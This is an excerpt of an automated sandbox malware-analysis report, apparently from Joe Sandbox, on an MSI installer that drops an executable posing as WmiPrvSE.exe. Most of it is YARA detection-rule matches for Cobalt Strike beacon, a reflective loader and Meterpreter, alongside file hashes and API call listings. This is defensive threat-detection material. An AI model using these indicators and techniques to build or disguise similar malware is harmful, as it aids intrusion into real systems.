                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_007801A823_2_007801A8
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0076DA3C23_2_0076DA3C
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0078F20023_2_0078F200
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0076A28023_2_0076A280
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0078D28023_2_0078D280
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00777B3823_2_00777B38
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0078DBF023_2_0078DBF0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0078C3B023_2_0078C3B0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00769D6C23_2_00769D6C
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0078252823_2_00782528
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0078651423_2_00786514
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0077867C23_2_0077867C
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00781E6423_2_00781E64
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0078B6B023_2_0078B6B0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00780F7423_2_00780F74
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00770F3423_2_00770F34
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00782F9C23_2_00782F9C
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0078CF9723_2_0078CF97
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\WmiPrvSE.exe 298EADA4723177FAC953AFC963A4BFFA56D7DBBA3D1BEA340E53953E736BCA80
                Source: Joe Sandbox ViewDropped File: C:\Windows\Installer\MSI3FB2.tmp 39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: String function: 000654B0 appears 64 times
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: String function: 000CD560 appears 54 times
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: String function: 000651E0 appears 65 times
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: String function: 000638D0 appears 48 times
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: String function: 000CC49F appears 36 times
                Source: 1eSOBjseu2.msiBinary or memory string: OriginalFileNameaipackagechainer.exe vs 1eSOBjseu2.msi
                Source: 1eSOBjseu2.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs 1eSOBjseu2.msi
                Source: 1eSOBjseu2.msiBinary or memory string: OriginalFilenamePrereq.dllF vs 1eSOBjseu2.msi
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: classification engineClassification label: mal100.troj.evad.winMSI@37/69@0/1
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000876D0 FormatMessageW,GetLastError,4_2_000876D0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00770B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,23_2_00770B70
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A5D40 GetDiskFreeSpaceExW,4_2_000A5D40
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00773A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,23_2_00773A64
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000AEAE0 CoCreateInstance,4_2_000AEAE0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00080A00 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,4_2_00080A00
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\WmiPrvSEJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\WmiPrvSEJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
